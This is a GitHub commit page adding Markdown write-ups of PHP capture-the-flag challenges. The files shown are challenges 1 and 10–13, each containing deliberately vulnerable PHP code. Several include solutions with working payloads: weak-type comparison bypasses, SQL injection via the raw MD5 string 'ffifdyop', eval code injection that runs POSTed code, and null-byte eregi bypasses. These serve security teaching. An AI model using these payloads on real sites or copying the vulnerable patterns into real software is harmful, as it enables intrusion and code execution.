Skip to content

Commit 02e2506

Browse files
CHYbetaCHYbeta
committed
Track 49 files into repository.
- untracked .gitattributes - untracked php/challenge-1.md - untracked php/challenge-10.md - untracked php/challenge-11.md - untracked php/challenge-12.md - untracked php/challenge-13.md - untracked php/challenge-14.md - untracked php/challenge-15.md - untracked php/challenge-16.md - untracked php/challenge-17.md - untracked php/challenge-18.md - untracked php/challenge-19.md - untracked php/challenge-2.md - untracked php/challenge-20.md - untracked php/challenge-21.md - untracked php/challenge-22.md - untracked php/challenge-23.md - untracked php/challenge-24.md - untracked php/challenge-25.md - untracked php/challenge-26.md - untracked php/challenge-27.md - untracked php/challenge-28.md - untracked php/challenge-29.md - untracked php/challenge-3.md - untracked php/challenge-30.md - untracked php/challenge-31.md - untracked php/challenge-32.md - untracked php/challenge-33.md - untracked php/challenge-34.md - untracked php/challenge-35.md - untracked php/challenge-36.md - untracked php/challenge-37.md - untracked php/challenge-38.md - untracked php/challenge-39.md - untracked php/challenge-4.md - untracked php/challenge-40.md - untracked php/challenge-41.md - untracked php/challenge-42.md - untracked php/challenge-43.md - untracked php/challenge-44.md - untracked php/challenge-45.md - untracked php/challenge-46.md - untracked php/challenge-47.md - untracked php/challenge-48.md - untracked php/challenge-5.md - untracked php/challenge-6.md - untracked php/challenge-7.md - untracked php/challenge-8.md - untracked php/challenge-9.md Auto commit by GitBook Editor
1 parent 2c2a803 commit 02e2506

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

49 files changed

+2748
-0
lines changed

.gitattributes

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
*.md linguist-language=php

php/challenge-1.md

+79
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,79 @@
1+
# Challenge
2+
```php
3+
<?php
4+
5+
/*******************************************************************
6+
* PHP Challenge 2015
7+
*******************************************************************
8+
* Why leave all the fun to the XSS crowd?
9+
*
10+
* Do you know PHP?
11+
* And are you up to date with all its latest peculiarities?
12+
*
13+
* Are you sure?
14+
*
15+
* If you believe you do then solve this challenge and create an
16+
* input that will make the following code believe you are the ADMIN.
17+
* Becoming any other user is not good enough, but a first step.
18+
*
19+
* Attention this code is installed on a Mac OS X 10.9 system
20+
* that is running PHP 5.4.30 !!!
21+
*
22+
* TIPS: OS X is mentioned because OS X never runs latest PHP
23+
* Challenge will not work with latest PHP
24+
* Also challenge will only work on 64bit systems
25+
* To solve challenge you need to combine what a normal
26+
* attacker would do when he sees this code with knowledge
27+
* about latest known PHP quirks
28+
* And you cannot bruteforce the admin password directly.
29+
* To give you an idea - first half is:
30+
* orewgfpeowöfgphewoöfeiuwgöpuerhjwfiuvuger
31+
*
32+
* If you know the answer please submit it to [email protected]
33+
********************************************************************/
34+
35+
$users = array(
36+
"0:9b5c3d2b64b8f74e56edec71462bd97a" ,
37+
"1:4eb5fb1501102508a86971773849d266",
38+
"2:facabd94d57fc9f1e655ef9ce891e86e",
39+
"3:ce3924f011fe323df3a6a95222b0c909",
40+
"4:7f6618422e6a7ca2e939bd83abde402c",
41+
"5:06e2b745f3124f7d670f78eabaa94809",
42+
"6:8e39a6e40900bb0824a8e150c0d0d59f",
43+
"7:d035e1a80bbb377ce1edce42728849f2",
44+
"8:0927d64a71a9d0078c274fc5f4f10821",
45+
"9:e2e23d64a642ee82c7a270c6c76df142",
46+
"10:70298593dd7ada576aff61b6750b9118"
47+
);
48+
49+
$valid_user = false;
50+
51+
$input = $_COOKIE['user'];
52+
$input[1] = md5($input[1]);
53+
54+
foreach ($users as $user)
55+
{
56+
$user = explode(":", $user);
57+
if ($input === $user) {
58+
$uid = $input[0] + 0;
59+
$valid_user = true;
60+
}
61+
}
62+
63+
if (!$valid_user) {
64+
die("not a valid user\n");
65+
}
66+
67+
if ($uid == 0) {
68+
69+
echo "Hello Admin How can I serve you today?\n";
70+
echo "SECRETS ....\n";
71+
72+
} else {
73+
echo "Welcome back user\n";
74+
}
75+
```
76+
77+
# Reffenence
78+
+ [PHP Challenge 2015](http://www.sektioneins.de/blog/15-07-31-php_challenge_2015.html)
79+
+ [PHP Challenge 2015 Solution](http://www.sektioneins.de/blog/15-08-03-php_challenge_2015_solution.html)

php/challenge-10.md

+48
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,48 @@
1+
# Challenge
2+
```php
3+
<?php
4+
error_reporting(0);
5+
echo "<!--index.phps-->";
6+
if(!$_GET['id'])
7+
{
8+
header('Location: index.php?id=1');
9+
exit();
10+
}
11+
$id=$_GET['id'];
12+
$a=$_GET['a'];
13+
$b=$_GET['b'];
14+
if(stripos($a,'.'))
15+
{
16+
echo 'Hahahahahaha';
17+
return ;
18+
}
19+
$data = @file_get_contents($a,'r');
20+
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
21+
{
22+
require("flag.txt");
23+
}
24+
else
25+
{
26+
print "work harder!harder!harder!";
27+
}
28+
?>
29+
```
30+
31+
# Solution
32+
php弱类型绕过。当`$a`为php://input,`$data`可以通过php://input来接受post数据。
33+
34+
`$id`传一个字符进去,满足`!$_GET['id']`为假。与数字进行比较时会被转换为0,满足`$id==0`
35+
36+
`$b`,要求长度大于5,其次要求满足`eregi`的要求和首字母不为4。可以设置`$b``%00111111`,这样,substr()会发生截断,在匹配时时进行eregi("111","1114")满足,同时%00对strlen不会发生截断。
37+
38+
payload:
39+
```
40+
?id=a&a=php://input&b=%0011111
41+
42+
POST:
43+
1112 is a nice lab!
44+
```
45+
46+
# Refference
47+
+ [jarvisoj : IN-A-mess](http://web.jarvisoj.com:32780/index.php?id=1)
48+
+ [chybeta : IN-A-mess](https://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/#IN-A-mess)

php/challenge-11.md

+59
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,59 @@
1+
# Challenge
2+
```php
3+
<?php
4+
5+
error_reporting(0);
6+
7+
$link = mysql_connect('localhost', 'root', '');
8+
if (!$link) {
9+
die('Could not connect to MySQL: ' . mysql_error());
10+
}
11+
12+
// 选择数据库
13+
$db = mysql_select_db("test", $link);
14+
if(!$db)
15+
{
16+
echo 'select db error';
17+
exit();
18+
}
19+
20+
// 执行sql
21+
$password = $_GET['pwd'];
22+
$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";
23+
var_dump($sql);
24+
$result=mysql_query($sql) or die('<pre>' . mysql_error() . '</pre>' );
25+
26+
$row1 = mysql_fetch_row($result);
27+
var_dump($row1);
28+
29+
mysql_close($link);
30+
31+
?>
32+
```
33+
34+
# Solution
35+
sql语句为`"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"`
36+
37+
若md5后的hex转换成字符串后,如果包含`'or'<trash>`这样的字符串,`<trash>`的意思是垃圾值/可忽略
38+
39+
则拼接后构成的语句为:
40+
```
41+
SELECT * FROM admin WHERE pass = ''or'<trash>'
42+
```
43+
44+
而字符串ffifdyop,md5后,276f722736c95d99e921722cf9ed621c,再转成字符串:`'or'6<trash>`
45+
46+
拼接后的语句为:
47+
```
48+
SELECT * FROM admin WHERE pass = ''or'6<trash>'
49+
```
50+
成功注入。
51+
52+
payload:
53+
```
54+
?pwd=ffifdyop
55+
```
56+
# Refference
57+
+ [SQL injection with raw MD5 hashes](https://joychou.org/web/SQL-injection-with-raw-MD5-hashes.html)
58+
+ [jarvisoj : Login](http://web.jarvisoj.com:32772/)
59+
+ [chybeta : Login](https://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/#Login)

php/challenge-12.md

+44
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,44 @@
1+
# Challenge
2+
```php
3+
<?php
4+
error_reporting(0);
5+
show_source(__FILE__);
6+
7+
$a = @$_REQUEST['hello'];
8+
eval("var_dump($a);");
9+
```
10+
11+
# Solution
12+
## payload1
13+
```
14+
?hello=);eval($_POST['A']);%2f%2f
15+
16+
17+
18+
?hello=);eval(phpinfo());//
19+
```
20+
var_dump($a);后的结果为
21+
```
22+
string(22) ");eval($_POST['A']);//"
23+
```
24+
25+
26+
```
27+
eval("string(21) ");eval($_GET['A']);//"");
28+
```
29+
30+
## payload2
31+
```
32+
?hello=);eval($_GET[c]&c=phpinfo();
33+
```
34+
var_dump()后的结果是
35+
```
36+
string(15) ");eval($_GET[c]"
37+
```
38+
39+
40+
```
41+
eval("string(17) ");eval($_GET[c]" string(0) "" ");
42+
```
43+
# Refference
44+
+ [XNUCA 赛前指导 default](http://218.76.35.74:20131/index2.php)

php/challenge-13.md

+125
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,125 @@
1+
# Challenge
2+
```php
3+
<?php
4+
show_source(__FILE__);
5+
$v1=0;$v2=0;$v3=0;
6+
$a=(array)json_decode(@$_GET['foo']);
7+
if(is_array($a)){
8+
is_numeric(@$a["bar1"])?die("nope"):NULL;
9+
if(@$a["bar1"]){
10+
($a["bar1"]>2016)?$v1=1:NULL;
11+
}
12+
if(is_array(@$a["bar2"])){
13+
if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
14+
$pos = array_search("nudt", $a["a2"]);
15+
$pos===false?die("nope"):NULL;
16+
foreach($a["bar2"] as $key=>$val){
17+
$val==="nudt"?die("nope"):NULL;
18+
}
19+
$v2=1;
20+
}
21+
}
22+
$c=@$_GET['cat'];
23+
$d=@$_GET['dog'];
24+
if(@$c[1]){
25+
if(!strcmp($c[1],$d) && $c[1]!==$d){
26+
eregi("3|1|c",$d.$c[0])?die("nope"):NULL;
27+
strpos(($c[0].$d), "htctf2016")?$v3=1:NULL;
28+
}
29+
}
30+
if($v1 && $v2 && $v3){
31+
include "flag.php";
32+
echo $flag;
33+
}
34+
?>
35+
```
36+
37+
# Solution
38+
## v1
39+
```php
40+
$a=(array)json_decode(@$_GET['foo']);
41+
if(is_array($a)){
42+
is_numeric(@$a["bar1"])?die("nope"):NULL;
43+
if(@$a["bar1"]){
44+
($a["bar1"]>2016)?$v1=1:NULL;
45+
}
46+
....
47+
}
48+
```
49+
传入的foo,经过一次json_decode,然后转换成array。然后判断 `$a["bar1"]` 是否满足 is_numeric,若满足则die掉。接下来又判断 `$a["bar1"]` 是否大于 2016 。
50+
51+
利用php弱类型特性,可以设置
52+
```
53+
$a["bar1"] = 2017a
54+
```
55+
56+
这样is_numeric时会判断其为字符串而不是数字,而在与2016的比较中,会直接转换成2017,满足大于2016。这样 v1 就被设置为 1 了。
57+
58+
## v2
59+
```php
60+
if(is_array(@$a["bar2"])){
61+
if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
62+
$pos = array_search("nudt", $a["a2"]);
63+
$pos===false?die("nope"):NULL;
64+
foreach($a["bar2"] as $key=>$val){
65+
$val==="nudt"?die("nope"):NULL;
66+
}
67+
$v2=1;
68+
}
69+
```
70+
71+
接下来,要求`$a["bar2"]`是个数组,其中元素的个数为5个(count($a["bar2"])!==5),同时要求`$a["bar2"][0]`是数组。所以我们设置:
72+
```
73+
$a["bar2"] = [[],2,3,4,5]
74+
```
75+
76+
对于 `$pos = array_search("nudt", $a["a2"]);`,它搜索字符串“nudt”在$a["a2"]中的位置。若没有找到,array_search返回false,会通过严格比较导致die掉。所以这里要设置:
77+
```
78+
$a["a2"] = “nudt”
79+
```
80+
注意这里因为用了`$pos===false?`的严格比较,所以0不`===`false。
81+
82+
之后就能设置 v2 = 1
83+
84+
结合$a是由json_decode得来,所以第一个payload为:
85+
```
86+
foo={"bar1":"2017a","bar2":[[],2,3,4,5],"a2":["nudt"]}
87+
```
88+
89+
## v3
90+
```php
91+
$c=@$_GET['cat'];
92+
$d=@$_GET['dog'];
93+
if(@$c[1]){
94+
if(!strcmp($c[1],$d) && $c[1]!==$d){
95+
eregi("3|1|c",$d.$c[0])?die("nope"):NULL;
96+
strpos(($c[0].$d), "htctf2016")?$v3=1:NULL;
97+
}
98+
}
99+
if($v1 && $v2 && $v3){
100+
include "flag.php";
101+
echo $flag;
102+
}
103+
```
104+
105+
先会用strcmp进行比较,利用数组array和字符串进行strcmp比较会返回null,而且数组array也不会等于字符串,我们可以设置cat[1]为一个数组。
106+
107+
接下来用eregi对拼接后的字符串`$d.$c[0]`进行正则匹配,若匹配到则die掉。而下一步又要求拼接字符串`$c[0].$d`中要有字符串“htctf2016”。这里利用%00对eregi的截断功能,则在正则匹配eregi时在开头时就匹配结束掉。
108+
109+
`strpos(($c[0].$d), "htctf2016")`中,还要求“htctf2016”不能出现在开头。
110+
111+
所以设置:
112+
```
113+
$d = %00 即 dog=%00
114+
115+
$c[0] = "ahtctf2016"
116+
```
117+
118+
所以综上所述,构造最后的payload如下:
119+
```
120+
?foo={"bar1":"2017e","bar2":[[],2,3,4,5],"a2":["nudt"]}&cat[0]=ahtctf2016&cat[1][]=&dog=%00
121+
```
122+
123+
124+
# Refference
125+
+ [chybeta : php是最好的语言](https://chybeta.github.io/2017/08/18/XNUCA-2017-Web%E4%B8%93%E9%A2%98%E8%B5%9B%E5%89%8D%E6%8C%87%E5%AF%BC-php%E6%98%AF%E6%9C%80%E5%A5%BD%E7%9A%84%E8%AF%AD%E8%A8%80-writeup/)

0 commit comments

Comments
 (0)